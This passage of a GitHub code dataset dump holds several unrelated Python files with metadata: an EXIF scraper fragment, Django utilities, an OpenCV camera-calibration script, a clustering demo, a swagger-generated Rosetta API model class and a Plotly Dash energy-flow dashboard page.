Skipping...\")\n continue\n print(filename, ' successfully inserted')\n time.sleep(999999999)\n\nif __name__ == '__main__':\n run()\n", "repo_name": "downpat/exif-scraper", "sub_path": "scraper/scrape.py", "file_name": "scrape.py", "file_ext": "py", "file_size_in_byte": 2746, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "db.ImageDatabase", "line_number": 37, "usage_type": "call"}, {"api_name": "db.setup", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 41, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 41, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 48, "usage_type": "call"}, {"api_name": "db.insert_photo", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 67, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 67, "usage_type": "name"}, {"api_name": "db.insert_exif", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "26380597293", "text": "from django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\nfrom .authentication import *\nfrom io import StringIO\nfrom rest_framework.parsers import JSONParser\nimport json\n\nclass OverwiteStorageSystem(FileSystemStorage):\n \n def get_available_name(self, name, max_length=None):\n # if the file name already exists, remove it as if it was a true file system\n if self.exists(name):\n self.delete(name)\n return super().get_available_name(name, max_length)\n\n\ndef range_with_floats(start, stop, step=1):\n while stop > start:\n yield start\n start += step\n\ndef get_host_name(request):\n if request.is_secure():\n return f'https://{request.get_host()}'\n return f'http://{request.get_host()}'\n\n\ndef get_list_index(list, index, default):\n try:\n return list[4]\n except IndexError:\n return default\n", "repo_name": "samuelitwaru/wex-erp", "sub_path": "utils/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "12191640907", "text": "import cv2\nfrom cv2 import drawChessboardCorners\nimport numpy as np\ncap = cv2.VideoCapture(0)\npic = []\n\nobjp = np.zeros((9*6,3), np.float32)\n# for i in range(6):\n# for j in range(9):\n# objp[i*9+j]=(i,j,0)\n\nobjp[:, :2]=np.mgrid[0:9, 0:6].T.reshape(-1, 2)\nprint(objp)\nobjpoints = []\nimgpoints = []\nwhile len(objpoints) < 50:\n ret, frame = cap.read()\n h,w = frame.shape[:2]\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n ret2, corner = cv2.findChessboardCorners(gray_frame, (9,6))\n cv2.imshow(\"frame\", frame)\n cv2.waitKey(33)\n if ret2:\n corner2 = cv2.cornerSubPix(gray_frame,corner, (11,11), (-1,-1), (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1))\n objpoints.append(objp.copy())\n imgpoints.append(corner2)\n drawn_frame = drawChessboardCorners(frame, (9, 6), corner2, ret2)\n cv2.imshow(\"frame\", drawn_frame)\n cv2.waitKey(33)\n\nret, cameraMatrix, distCoeffs, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, (h, w), None, None)\nf = cv2.FileStorage(\"calibrate.xml\", cv2.FILE_STORAGE_WRITE)\nf.write(\"intrinsic\", cameraMatrix)\nf.write(\"distortion\", distCoeffs)\nf.release()", "repo_name": "jayin92/NYCU-cv-and-uav", "sub_path": "lab04/camerea_cali.py", "file_name": "camerea_cali.py", "file_ext": "py", "file_size_in_byte": 1171, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.cornerSubPix", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.FileStorage", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.FILE_STORAGE_WRITE", "line_number": 32, "usage_type": "attribute"}]}
+{"seq_id": "24656845249", "text": "# © 2023, Universität Bern, Chair of Quantitative Methods, Vanessa Tran, Manuel Kammermann, Philipp Baumann\n\nimport pandas as pd\nimport numpy as np\nfrom mpfcc_algorithm import mpfcc\nimport matplotlib.pyplot as plt\n\n# Read data of illustrative example\ndf = pd.read_csv('illustrative_example.csv')\n\n# Extract features and colors\nX = df.values[:, 1:-1]\ncolors = df.values[:, -1].astype(int)\n\n# Define parameters\nnumber_of_clusters = 3\nmax_cardinality = 11\nmin_balance = 1\n\n# Run MPFCC-Algorithm\nlabels = mpfcc(X, colors, number_of_clusters, max_cardinality, min_balance,\n random_state=24, mpfcc_time_limit=300)\n\n# Visualize resulting partition\ncenters = np.unique(labels)\nplt.scatter(X[:, 0], X[:, 1], c=np.array(['red', 'blue'])[colors], s=30, zorder=10)\nfor i in range(X.shape[0]):\n plt.plot([X[i, 0], X[labels[i], 0]], [X[i, 1], X[labels[i], 1]],\n color='black', linewidth=0.8, zorder=-1, alpha=0.2)\nplt.show()\n", "repo_name": "phil85/MPFCC-Algorithm", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "mpfcc_algorithm.mpfcc", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]}
+{"seq_id": "1104321639", "text": "# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.account_identifier import AccountIdentifier # noqa: F401,E501\nfrom swagger_server.models.amount import Amount # noqa: F401,E501\nfrom swagger_server.models.coin_change import CoinChange # noqa: F401,E501\nfrom swagger_server.models.operation_identifier import OperationIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass Operation(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, operation_identifier: OperationIdentifier=None, related_operations: List[OperationIdentifier]=None, type: str=None, status: str=None, account: AccountIdentifier=None, amount: Amount=None, coin_change: CoinChange=None, metadata: object=None): # noqa: E501\n \"\"\"Operation - a model defined in Swagger\n\n :param operation_identifier: The operation_identifier of this Operation. # noqa: E501\n :type operation_identifier: OperationIdentifier\n :param related_operations: The related_operations of this Operation. # noqa: E501\n :type related_operations: List[OperationIdentifier]\n :param type: The type of this Operation. # noqa: E501\n :type type: str\n :param status: The status of this Operation. # noqa: E501\n :type status: str\n :param account: The account of this Operation. # noqa: E501\n :type account: AccountIdentifier\n :param amount: The amount of this Operation. # noqa: E501\n :type amount: Amount\n :param coin_change: The coin_change of this Operation. # noqa: E501\n :type coin_change: CoinChange\n :param metadata: The metadata of this Operation. # noqa: E501\n :type metadata: object\n \"\"\"\n self.swagger_types = {\n 'operation_identifier': OperationIdentifier,\n 'related_operations': List[OperationIdentifier],\n 'type': str,\n 'status': str,\n 'account': AccountIdentifier,\n 'amount': Amount,\n 'coin_change': CoinChange,\n 'metadata': object\n }\n\n self.attribute_map = {\n 'operation_identifier': 'operation_identifier',\n 'related_operations': 'related_operations',\n 'type': 'type',\n 'status': 'status',\n 'account': 'account',\n 'amount': 'amount',\n 'coin_change': 'coin_change',\n 'metadata': 'metadata'\n }\n self._operation_identifier = operation_identifier\n self._related_operations = related_operations\n self._type = type\n self._status = status\n self._account = account\n self._amount = amount\n self._coin_change = coin_change\n self._metadata = metadata\n\n @classmethod\n def from_dict(cls, dikt) -> 'Operation':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Operation of this Operation. 
# noqa: E501\n :rtype: Operation\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def operation_identifier(self) -> OperationIdentifier:\n \"\"\"Gets the operation_identifier of this Operation.\n\n\n :return: The operation_identifier of this Operation.\n :rtype: OperationIdentifier\n \"\"\"\n return self._operation_identifier\n\n @operation_identifier.setter\n def operation_identifier(self, operation_identifier: OperationIdentifier):\n \"\"\"Sets the operation_identifier of this Operation.\n\n\n :param operation_identifier: The operation_identifier of this Operation.\n :type operation_identifier: OperationIdentifier\n \"\"\"\n if operation_identifier is None:\n raise ValueError(\"Invalid value for `operation_identifier`, must not be `None`\") # noqa: E501\n\n self._operation_identifier = operation_identifier\n\n @property\n def related_operations(self) -> List[OperationIdentifier]:\n \"\"\"Gets the related_operations of this Operation.\n\n Restrict referenced related_operations to identifier indices < the current operation_identifier.index. This ensures there exists a clear DAG-structure of relations. Since operations are one-sided, one could imagine relating operations in a single transfer or linking operations in a call tree. # noqa: E501\n\n :return: The related_operations of this Operation.\n :rtype: List[OperationIdentifier]\n \"\"\"\n return self._related_operations\n\n @related_operations.setter\n def related_operations(self, related_operations: List[OperationIdentifier]):\n \"\"\"Sets the related_operations of this Operation.\n\n Restrict referenced related_operations to identifier indices < the current operation_identifier.index. This ensures there exists a clear DAG-structure of relations. Since operations are one-sided, one could imagine relating operations in a single transfer or linking operations in a call tree. # noqa: E501\n\n :param related_operations: The related_operations of this Operation.\n :type related_operations: List[OperationIdentifier]\n \"\"\"\n\n self._related_operations = related_operations\n\n @property\n def type(self) -> str:\n \"\"\"Gets the type of this Operation.\n\n Type is the network-specific type of the operation. Ensure that any type that can be returned here is also specified in the NetworkOptionsResponse. This can be very useful to downstream consumers that parse all block data. # noqa: E501\n\n :return: The type of this Operation.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type: str):\n \"\"\"Sets the type of this Operation.\n\n Type is the network-specific type of the operation. Ensure that any type that can be returned here is also specified in the NetworkOptionsResponse. This can be very useful to downstream consumers that parse all block data. # noqa: E501\n\n :param type: The type of this Operation.\n :type type: str\n \"\"\"\n if type is None:\n raise ValueError(\"Invalid value for `type`, must not be `None`\") # noqa: E501\n\n self._type = type\n\n @property\n def status(self) -> str:\n \"\"\"Gets the status of this Operation.\n\n Status is the network-specific status of the operation. Status is not defined on the transaction object because blockchains with smart contracts may have transactions that partially apply (some operations are successful and some are not). Blockchains with atomic transactions (all operations succeed or all operations fail) will have the same status for each operation. 
On-chain operations (operations retrieved in the `/block` and `/block/transaction` endpoints) MUST have a populated status field (anything on-chain must have succeeded or failed). However, operations provided during transaction construction (often times called \\\"intent\\\" in the documentation) MUST NOT have a populated status field (operations yet to be included on-chain have not yet succeeded or failed). # noqa: E501\n\n :return: The status of this Operation.\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status: str):\n \"\"\"Sets the status of this Operation.\n\n Status is the network-specific status of the operation. Status is not defined on the transaction object because blockchains with smart contracts may have transactions that partially apply (some operations are successful and some are not). Blockchains with atomic transactions (all operations succeed or all operations fail) will have the same status for each operation. On-chain operations (operations retrieved in the `/block` and `/block/transaction` endpoints) MUST have a populated status field (anything on-chain must have succeeded or failed). However, operations provided during transaction construction (often times called \\\"intent\\\" in the documentation) MUST NOT have a populated status field (operations yet to be included on-chain have not yet succeeded or failed). # noqa: E501\n\n :param status: The status of this Operation.\n :type status: str\n \"\"\"\n\n self._status = status\n\n @property\n def account(self) -> AccountIdentifier:\n \"\"\"Gets the account of this Operation.\n\n\n :return: The account of this Operation.\n :rtype: AccountIdentifier\n \"\"\"\n return self._account\n\n @account.setter\n def account(self, account: AccountIdentifier):\n \"\"\"Sets the account of this Operation.\n\n\n :param account: The account of this Operation.\n :type account: AccountIdentifier\n \"\"\"\n\n self._account = account\n\n @property\n def amount(self) -> Amount:\n \"\"\"Gets the amount of this Operation.\n\n\n :return: The amount of this Operation.\n :rtype: Amount\n \"\"\"\n return self._amount\n\n @amount.setter\n def amount(self, amount: Amount):\n \"\"\"Sets the amount of this Operation.\n\n\n :param amount: The amount of this Operation.\n :type amount: Amount\n \"\"\"\n\n self._amount = amount\n\n @property\n def coin_change(self) -> CoinChange:\n \"\"\"Gets the coin_change of this Operation.\n\n\n :return: The coin_change of this Operation.\n :rtype: CoinChange\n \"\"\"\n return self._coin_change\n\n @coin_change.setter\n def coin_change(self, coin_change: CoinChange):\n \"\"\"Sets the coin_change of this Operation.\n\n\n :param coin_change: The coin_change of this Operation.\n :type coin_change: CoinChange\n \"\"\"\n\n self._coin_change = coin_change\n\n @property\n def metadata(self) -> object:\n \"\"\"Gets the metadata of this Operation.\n\n\n :return: The metadata of this Operation.\n :rtype: object\n \"\"\"\n return self._metadata\n\n @metadata.setter\n def metadata(self, metadata: object):\n \"\"\"Sets the metadata of this Operation.\n\n\n :param metadata: The metadata of this Operation.\n :type metadata: object\n \"\"\"\n\n self._metadata = metadata\n", "repo_name": "xanimo/rosetta-api", "sub_path": "server/python-flask-server-generated/swagger_server/models/operation.py", "file_name": "operation.py", "file_ext": "py", "file_size_in_byte": 10337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": 
"swagger_server.models.base_model_.Model", "line_number": 16, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 43, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 43, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 46, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 47, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 48, "usage_type": "name"}, {"api_name": "swagger_server.util.deserialize_model", "line_number": 80, "usage_type": "call"}, {"api_name": "swagger_server.util", "line_number": 80, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 83, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 106, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 117, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 117, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 177, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 187, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 198, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 208, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 219, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 229, "usage_type": "name"}]}
+{"seq_id": "9855663672", "text": "import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input,Output,State,MATCH,ALL\nimport pandas as pd\nimport pickle as pkl\nimport os\nimport base64\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport json\nfrom flask import Flask\nimport math\nfrom dash_extensions.snippets import send_data_frame\nfrom dash_extensions import Download\nfrom collections import OrderedDict\nimport time\n\nline_fig=go.Figure()\ntext_font_size='1.7vh'\nnavbar_font_size='2vh'\nheader_font_size='2vh'\n\n\n# the div where the flow line chart will be inside it\n# dcc.Graph src : https://www.youtube.com/watch?v=G8r2BB3GFVY\n\nline_div=html.Div([\n dcc.Graph(id='flow_line_chart', config={'displayModeBar': True, 'scrollZoom': True,'displaylogo': False},\n style=dict(height='45vh',backgroundColor='#20374c') ,figure=line_fig\n ) ] ,id='flow_line_div'\n )\n\n\n# dropdown menu of resolutions\n# dcc.dropdown src : https://dash.plotly.com/dash-core-components/dropdown\n# note that i added some pure css to the all dropdowns in custom css file\n\nresolution_menu= dcc.Dropdown(\n id='flow_resolution_menu',\n options=[\n dict(label='Mean Agg. Quarterly', value='Mean Agg. Quarterly'), dict(label='Sum Agg. Quarterly', value='Sum Agg. Quarterly'),\n dict(label='Mean Agg. Monthly', value='Mean Agg. Monthly'), dict(label='Sum Agg. Monthly', value='Sum Agg. Monthly'),\n dict(label='Mean Agg. Daily', value='Mean Agg. Daily'), dict(label='Sum Agg. Daily', value='Sum Agg. Daily'),\n dict(label='Hourly', value='Hourly')\n ],\n value='Mean Agg. Quarterly' , style=dict(color='#0f2537',fontWeight='bold',textAlign='center',\n width='20vh',backgroundColor='#0f2537',border='1px solid #00bfff')\n )\n\n# text apears above resolution dropdown\nresolution_text=html.Div(html.H1('Resolution',\n style=dict(fontSize=text_font_size,fontWeight='bold',color='white',marginTop='')),\n style=dict(display='inline-block',marginLeft='',textAlign=\"center\",width='100%'))\n\n# the div that contains both the text and dropdown of resolution\nresolution_menu_div= html.Div([resolution_text,resolution_menu],\n style=dict( fontSize=text_font_size,\n marginLeft='2vh',marginBottom='',display='inline-block'))\n\n# the button that is pressed on to download data as csv\n# dbc.Button src : https://dash-bootstrap-components.opensource.faculty.ai/docs/components/button/\ndownload_csv=html.Div([dbc.Button(\"Download CSV\", color=\"primary\", size='lg', n_clicks=0,id=\"flow_download_csv\"\n ,style=dict(fontSize='1.6vh')\n )],style=dict(display='inline-block',marginLeft='2vh',marginTop='3%'))\n\n# dash Download component that handles downloading process from browser to device\n# Download component src : https://dash.plotly.com/dash-core-components/download\ncsv_download_data=html.Div([Download(id=\"flow_csv_download_data\")])\n\n# the function that create the flow page layout when pressing on page from navigation bar\ndef creat_flow_layout():\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n df_marks = object['DEU_FRA'] # getting a dataframe from pickle file to be used to get years range of data to be used in years slider later\n\n countries = list(object.keys()) # get countries which are keys of pickle dictionery to be used in countries dropdown menu\n object=None\n\n # list of scenarios to be used in scenarios check boxes later\n scenarios = ['Normal','1991', '1992', '1993', '1994', '1995', 
'1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015','Exp']\n\n # dropdown of countries\n country_menu = dcc.Dropdown(className=\"custom-dropdown\",\n id='flow_country_menu',\n\n options=[{'label': country, 'value': country} for country in countries] # get all countries from countries list\n ,\n value=countries[0],\n style=dict(color='#0f2537', fontWeight='bold', textAlign='center',\n width='20vh', backgroundColor='#0f2537', border='1px solid #00bfff')\n )\n\n country_text = html.Div(html.H1('Countries',\n style=dict(fontSize=text_font_size, fontWeight='bold', color='white',\n marginTop='')),\n style=dict(display='inline-block', marginLeft='', textAlign=\"center\", width='100%'))\n\n country_menu_div = html.Div([country_text, country_menu],\n style=dict(fontSize=text_font_size,\n marginLeft='', marginBottom='', display='inline-block'))\n\n scenarios_text = html.Div(html.H1('Scenarios',\n style=dict(fontSize=text_font_size, fontWeight='bold', color='white',\n marginTop='')),\n style=dict(display='inline-block', marginLeft='', textAlign=\"left\", width='100%'))\n\n # the check boxes element , src : https://dash-bootstrap-components.opensource.faculty.ai/docs/components/input/\n scenarios_list = dbc.Checklist(\n inline=True,\n options=[{'label': scenario, 'value': scenario} for scenario in scenarios] # get all scenarios from scenarios list\n ,\n value=[scenarios[0]], label_style=dict(fontSize='1.5vh'),\n id=\"flow_scenarios_list\", style=dict(fontSize='2vh', marginLeft='0', color='white')\n )\n\n bar_fig=go.Figure(go.Bar())\n\n bar_div = html.Div([\n dcc.Graph(id='flow_bar_chart', config={'displayModeBar': True, 'scrollZoom': True, 'displaylogo': False},\n style=dict(height='60vh', backgroundColor='#20374c'), figure=bar_fig\n )], id='bar_div'\n )\n\n\n\n # create new column of only years by getting the years from date column using pd.DatetimeIndex() function\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DatetimeIndex.year.html\n df_marks['Year'] = (pd.DatetimeIndex(df_marks.iloc[:, 26]).year).astype(str)\n # converting years column to int type\n df_marks['Year']=df_marks['Year'].astype('int32')\n # converting years column to list\n years=df_marks['Year'].to_list()\n # removing repeated years from years list\n years=list(OrderedDict.fromkeys(years))\n # setting the slider years marks from the years list\n marks_values={year: {'label': '{}'.format(year), 'style': {'color': 'white'}} for year in years}\n # dcc.RangeSlider src : https://dash.plotly.com/dash-core-components/rangeslider\n years_slider=html.Div([dcc.RangeSlider(min=years[0], max=years[-1], step=1, value=[years[1],years[-2]], marks=marks_values ,id='flow_bar_slider')\n ])\n\n # layout to be returned\n\n layout = [dbc.Col([dbc.Card(dbc.CardBody(\n [html.Div([dbc.Spinner([line_div], size=\"lg\", color=\"primary\", type=\"border\", fullscreen=False)\n , html.Br(), html.Div([country_menu_div, resolution_menu_div, download_csv],\n style={'width': '100%', 'display': 'flex', 'align-items': 'center',\n 'justify-content': 'center'}),\n html.Br(), scenarios_text, scenarios_list, csv_download_data,\n dcc.Store(id='flow_data', data=pd.DataFrame().to_dict('records'))\n\n ], style=dict(height='75vh'))])\n , style=dict(backgroundColor='#20374c')), html.Br()\n ], xl=dict(size=6, offset=0), lg=dict(size=6, offset=0),\n md=dict(size=10, offset=1), sm=dict(size=10, offset=1), xs=dict(size=10, offset=1)),\n\n 
dbc.Col([dbc.Card(dbc.CardBody(\n [html.Div([dbc.Spinner([bar_div],size=\"lg\", color=\"primary\", type=\"border\", fullscreen=False ),html.Br(),years_slider\n\n ], style=dict(height='75vh'))])\n\n\n\n , style=dict(backgroundColor='#20374c',height='77vh')), html.Br()],\n\n xl=dict(size=6, offset=0), lg=dict(size=6, offset=0),\n md=dict(size=10, offset=1), sm=dict(size=10, offset=1), xs=dict(size=10, offset=1)\n\n )\n\n ]\n return layout\n\n# function used in callback in app.py that returns the flow bar figure\n# it takes input of pickle file dictionery and slider range value\ndef create_flow_bar_fig(object,years_range):\n\n countries = list(object.keys()) # get countries names\n normal_scenario_mean = [] # list that will be filled with top 5 countries with normal scenario mean\n countries_list = [] # list of top 5 country names\n normal_df = pd.DataFrame() # the new dataframe that will be filled with the previos values to be used in bar figure\n\n # looping through all countries names\n for country in countries:\n\n df = object[country] # get the dataframe of the related country\n\n df=df[(df['Date'].dt.year>=years_range[0]) & (df['Date'].dt.year<=years_range[1])] # get the data only in between the ranges of slider\n # src : https://stackoverflow.com/questions/46878156/pandas-filter-dataframe-rows-with-a-specific-year\n\n df.set_index('Date', inplace=True)\n df.columns = ['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n mean_power = df['Normal'].mean()\n normal_scenario_mean.append(mean_power) #append the normal scenario mean power value to the list\n countries_list.append(country) # append the country name to the list\n\n object=None\n # add these lists in the new dataframe as columnbs\n normal_df['countries'] = countries_list\n normal_df['normal_scenario_mean'] = normal_scenario_mean\n # sort the values from larger to smaller\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.sort_values.html\n normal_df.sort_values(by='normal_scenario_mean', inplace=True, ascending=False)\n # get the top 5 values with relevent countries\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.nlargest.html\n normal_df = normal_df.nlargest(5, 'normal_scenario_mean')\n # print(normal_df)\n normal_df['normal_scenario_mean'] = normal_df['normal_scenario_mean'].astype('int64') # convert values from float to int\n\n # create horizontal bar chart of top 5\n # src : https://plotly.com/python/horizontal-bar-charts/\n bar_fig = go.Figure(data=[\n go.Bar(name='mean power', x=normal_df['normal_scenario_mean'], y=normal_df['countries'].to_list(),\n marker_color='#00bfff', text=normal_df['normal_scenario_mean'],\n textposition='outside', textfont=dict(\n size=15,\n color=\"white\"\n ), orientation='h')\n ])\n\n bar_fig.update_layout(\n title='Top 5 countries of mean power for normal scenario', xaxis_title='MWh/h',\n yaxis_title='Interconnection with neighbouring countries',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=14, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c' ,margin=dict(l=0, r=10, t=40, b=0)\n\n )\n # ,categoryorder='category descending'\n bar_fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n bar_fig.update_yaxes(showgrid=False, showline=True, zeroline=False, 
autorange=\"reversed\")\n\n return bar_fig\n", "repo_name": "rodiscience/ML-model-dashboard", "sub_path": "assets/Final/flow_page.py", "file_name": "flow_page.py", "file_ext": "py", "file_size_in_byte": 12185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "plotly.graph_objects.Figure", "line_number": 20, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 20, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 29, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 30, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 40, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 58, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_extensions.Download", "line_number": 70, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 75, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 88, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 103, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Checklist", "line_number": 113, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 121, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 121, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 123, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 133, "usage_type": "call"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 139, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 139, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_core_components.RangeSlider", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_html_components.Div", 